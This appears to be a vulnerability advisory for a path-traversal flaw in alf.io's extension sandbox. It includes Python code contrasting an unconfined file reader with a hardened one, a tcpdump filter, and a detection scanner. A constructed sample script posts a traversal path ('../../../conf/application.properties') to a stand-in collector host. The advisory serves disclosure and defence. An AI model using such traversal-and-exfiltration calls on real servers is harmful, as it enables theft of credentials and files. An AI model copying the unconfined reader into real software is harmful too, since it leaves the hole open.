CVE-2026-41412
Path Traversal in alf.io Ticket System
Publication date: 2026-06-02
Last updated on: 2026-06-03
Assigner: GitHub, Inc.
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| alf.io | alf.io | all versions before 2.0-M5-2606 (2.0-M5-2606 itself excluded, i.e. fixed) |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-73 | The product allows user input to control or influence paths or file names that are used in filesystem operations. |
| CWE-22 | The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. |
AI Powered Q&A
Can you explain this vulnerability to me?
The vulnerability exists in alf.io, an open source ticket reservation system. Before version 2.0-M5-2606, the alf.io extension sandbox injects a fully-functional HTTP client into every extension script's scope. One method, postFileAndSaveResponse(), accepts a file path parameter and reads the file contents without validating the path or restricting directory access. This allows a malicious extension script to read any file accessible to the JVM process user and send its contents to an attacker-controlled server via HTTP POST.
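The two CWEs listed above describe the same root cause: a caller-supplied path is handed to the filesystem without being confined to an allowed directory. The following added example (written in Python for brevity; alf.io is a Java application and this is not its code) puts the unconfined read pattern the advisory describes beside a hardened reader that resolves the path first and refuses anything outside a base directory, including `..` traversal, absolute paths and symlinks that point out of the tree. The sandbox layout and file names are constructed for the demonstration.

```python
import shutil
import tempfile
from pathlib import Path


def read_file_unconfined(path: str) -> bytes:
    """The pattern the advisory describes (CWE-73/CWE-22): the caller-supplied
    path is opened as-is, so any file the process user can read is reachable."""
    with open(path, "rb") as fh:
        return fh.read()


def read_file_confined(base_dir: str, requested: str) -> bytes:
    """Hardened variant: only regular files under base_dir may be read.

    Both paths are fully resolved (symlinks and '..' segments included)
    before the containment check, so '../' traversal, absolute paths and
    symlinks that point outside base_dir are all refused.
    """
    base = Path(base_dir).resolve()
    # pathlib discards `base` when `requested` is absolute; resolve() then
    # yields a path outside base, which the containment check rejects.
    target = (base / requested).resolve()
    if base not in target.parents:
        raise PermissionError(f"refusing to read outside {base}: {requested!r}")
    if not target.is_file():
        raise FileNotFoundError(requested)
    with open(target, "rb") as fh:
        return fh.read()


def demo() -> dict:
    """Exercise both readers against a constructed sandbox (hypothetical layout)."""
    root = Path(tempfile.mkdtemp())
    try:
        allowed_dir = root / "extension-files"      # the only directory reads should touch
        allowed_dir.mkdir()
        (allowed_dir / "report.csv").write_bytes(b"public report")
        secret = root / "secret.properties"         # sits one level above allowed_dir
        secret.write_bytes(b"db.password=constructed")
        try:                                        # symlink inside the sandbox pointing outside it
            (allowed_dir / "link.csv").symlink_to(secret)
            have_symlink = True
        except OSError:                             # symlinks may be unavailable on this platform
            have_symlink = False

        results = {}
        # Unconfined reader: traversal succeeds, which is the vulnerable behaviour.
        results["unconfined_traversal"] = read_file_unconfined(
            str(allowed_dir / ".." / "secret.properties"))
        # Confined reader: an in-directory read works ...
        results["confined_ok"] = read_file_confined(str(allowed_dir), "report.csv")
        # ... and every escape route is refused.
        probes = {"traversal": "../secret.properties", "absolute": str(secret)}
        if have_symlink:
            probes["symlink"] = "link.csv"
        for name, req in probes.items():
            try:
                read_file_confined(str(allowed_dir), req)
                results[name] = "allowed"
            except PermissionError:
                results[name] = "refused"
        return results
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The order of operations matters: resolving before checking is what defeats symlink escapes, and checking `base in target.parents` (rather than a string prefix test) avoids accepting a sibling directory whose name merely starts with the base name.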
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
This vulnerability allows a malicious extension script to read any file accessible to the JVM process user and exfiltrate it to an attacker-controlled server. Such unauthorized access and potential data exfiltration could lead to breaches of sensitive or personal data.
As a result, this vulnerability may impact compliance with data protection standards and regulations such as GDPR and HIPAA, which require strict controls over access to and protection of personal and sensitive information.
How can this vulnerability impact me?
This vulnerability can lead to unauthorized disclosure of sensitive files on the server running alf.io. An attacker who can run a malicious extension script can read arbitrary files accessible by the JVM user and exfiltrate their contents to an external server. This could expose confidential information, credentials, or other sensitive data, potentially leading to further compromise or data breaches.
What immediate steps should I take to mitigate this vulnerability?
To mitigate this vulnerability, upgrade alf.io to version 2.0-M5-2606 or later, where the issue has been patched.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection of this vulnerability involves identifying whether the alf.io system is running a vulnerable version (versions ≤ 2.0-M5-2509-1) and whether any malicious extension scripts are using the simpleHttpClient.postFileAndSaveResponse() method to read arbitrary files and exfiltrate data.
Since the vulnerability requires an authenticated administrator to register malicious extension scripts, monitoring for unusual or unauthorized extension scripts or suspicious HTTP POST requests to external servers can help detect exploitation attempts.
Suggested commands or approaches include:
- Check the alf.io version installed to confirm if it is vulnerable.
- Monitor HTTP POST traffic from the alf.io server to unknown or suspicious external IP addresses or domains using network monitoring tools like tcpdump or Wireshark.
- Example tcpdump command: `tcpdump -i <interface> 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'`. This filter selects port-80 TCP segments that carry a payload (it excludes bare ACKs); it does not match POST requests specifically, so inspect the captured payload (for example with `tcpdump -A`) for POST requests to unexpected destinations. Exfiltration over HTTPS (port 443) is not covered by a port-80 filter and is only visible as a connection to an unexpected host.
- Inspect the extension scripts registered in alf.io for any unauthorized or suspicious scripts that invoke simpleHttpClient.postFileAndSaveResponse().
- Review application logs for any calls to postFileAndSaveResponse() or unusual file access patterns.
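The version check and the extension-script review from the list above can be automated. The following added example (not alf.io's own tooling) scans extension script sources for calls to `simpleHttpClient.postFileAndSaveResponse(...)`, flags string arguments that are absolute paths or contain `..` segments, and flags URL arguments whose host is not on a deployment-specific allowlist; it also orders version strings numerically so a deployment can be compared against the fixed release named in this advisory. The sample scripts, the allowlisted host, and the assumption that the method's arguments are string literals in any order are all constructed for the demonstration; the argument order of the real method is not stated on this page and the scanner does not depend on it.

```python
import re
from urllib.parse import urlparse

FIXED_VERSION = "2.0-M5-2606"          # first fixed release named in the advisory
DANGEROUS_CALL = "postFileAndSaveResponse"
# Hosts this deployment legitimately posts files to (constructed allowlist).
EXPECTED_HOSTS = {"api.payments.example.invalid"}

CALL_RE = re.compile(r"simpleHttpClient\s*\.\s*" + DANGEROUS_CALL + r"\s*\(([^)]*)\)")
STRING_RE = re.compile(r"""(['"])(.*?)\1""")


def version_key(version: str) -> tuple:
    """Order alf.io version strings by their numeric components.
    Assumes the scheme seen on this page: '2.0-M5-2606' -> (2, 0, 5, 2606)."""
    return tuple(int(n) for n in re.findall(r"\d+", version))


def is_vulnerable_version(version: str) -> bool:
    """True when the installed version sorts before the fixed release."""
    return version_key(version) < version_key(FIXED_VERSION)


def looks_like_file_escape(literal: str) -> bool:
    """Absolute paths and parent-directory segments are the CWE-22 tell-tales."""
    if literal.startswith("/") or re.match(r"^[A-Za-z]:[\\/]", literal):
        return True
    return ".." in re.split(r"[\\/]", literal)


def scan_extension(name: str, source: str) -> list:
    """Return one finding per call to the dangerous method in `source`."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in CALL_RE.finditer(line):
            literals = [s for _, s in STRING_RE.findall(m.group(1))]
            urls = [s for s in literals if s.startswith(("http://", "https://"))]
            paths = [s for s in literals if s not in urls]
            reasons = []
            for url in urls:
                host = urlparse(url).hostname
                if host not in EXPECTED_HOSTS:
                    reasons.append(f"posts to unexpected host {host}")
            for path in paths:
                if looks_like_file_escape(path):
                    reasons.append(f"file argument escapes the extension tree: {path}")
            if not literals:
                reasons.append("non-literal arguments; review manually")
            findings.append({"script": name, "line": lineno,
                             "call": m.group(0), "reasons": reasons})
    return findings


def scan_all(scripts: dict) -> list:
    return [f for name, src in scripts.items() for f in scan_extension(name, src)]


def flagged(scripts: dict) -> list:
    """Only the findings that carry at least one reason for concern."""
    return [f for f in scan_all(scripts) if f["reasons"]]


# Constructed extension sources standing in for the scripts registered in alf.io.
SAMPLE_SCRIPTS = {
    "invoice-sync.js": """
        // constructed benign script: uploads a generated report to the expected API
        var out = simpleHttpClient.postFileAndSaveResponse("https://api.payments.example.invalid/upload", "reports/invoice.csv");
    """,
    "theme-helper.js": """
        // constructed suspicious script: reads a file outside the extension's own tree
        simpleHttpClient.postFileAndSaveResponse("https://collector.example.invalid/in", "../../../conf/application.properties");
    """,
    "mailer.js": """
        // constructed script that never touches the file-posting method
        var greeting = "mail sent";
    """,
}


if __name__ == "__main__":
    for v in ("2.0-M5-2509-1", "2.0-M5-2606"):
        print(f"{v}: {'VULNERABLE' if is_vulnerable_version(v) else 'fixed'}")
    for f in flagged(SAMPLE_SCRIPTS):
        print(f"{f['script']}:{f['line']}: {f['call']}")
        for reason in f["reasons"]:
            print(f"    - {reason}")
```

Point `SAMPLE_SCRIPTS` at the real script sources exported from the alf.io extension admin page and populate `EXPECTED_HOSTS` from the integrations the deployment actually uses; a call whose arguments are not string literals is reported for manual review rather than silently passed.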